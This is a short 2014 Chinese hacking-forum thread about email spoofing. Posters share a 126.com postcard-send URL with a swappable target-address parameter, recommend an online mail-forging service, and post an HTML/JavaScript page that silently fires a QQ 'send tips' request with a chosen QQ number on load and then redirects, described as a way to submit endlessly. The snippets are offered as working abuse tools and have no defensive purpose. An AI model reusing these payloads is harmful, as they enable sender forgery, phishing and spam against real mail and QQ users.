gty48 发表于 2014-2-22 11:45:01

邮件伪造?

尝试了下 木马游民的 邮件伪造
效果 不尽如人意 实际上他就是改了一个提交的值而已
http://postcard.mail.126.com/mailpostcard/send.do?sid=RBDYVQHBNCXmOHrrvWBBgLScDnEbuHkH&uid=【目标邮箱】&host=ewebmail.mail.126.com&ver=js4&style=24&skin=126green&color=158144&from=compose
就是这样
发信的效果

其实伪造邮件最好是有一台服务器,在上面搭建
具体方法网上有很多
还可以用这个http://emkei.cz/
这个网站提供在线的邮件伪造服务

Diana 发表于 2014-2-22 13:40:43

可以改成无限提交
比如

<html>
<script>
window.onload =function() {
      var o=new Image();
      o.src="http://888.qq.com/party/party_2013/flight_chess/flight_chess_send_tips.php?sendIds=QQ号";
         if(o.complete){
       location.replace(document.referrer);
      }else{
      o.onload = function(){
         location.replace(document.referrer);
      };
      o.onerror = function(){
         location.replace(document.referrer);
      };
      }
          //code by wadd
}
</script>
<body >
</body>
</html>

木马游民 发表于 2014-2-22 13:58:30

发信接口不敢暴露。。。

木马游民 发表于 2014-2-22 13:58:41

让你们自己去挖。哈哈

契约 发表于 2014-2-22 14:17:07

楼主我看到你QQ号了

gty48 发表于 2014-2-22 15:00:41

契约 发表于 2014-2-22 14:17 static/image/common/back.gif
楼主我看到你QQ号了

我的qq资料上有啊

90_ 发表于 2014-2-22 18:01:45

对于软件得原理,抓包就可以,自己动手是件好事

LostSoul 发表于 2014-2-23 05:44:05

这网址不是我发的?
页: [1]
查看完整版本: 邮件伪造?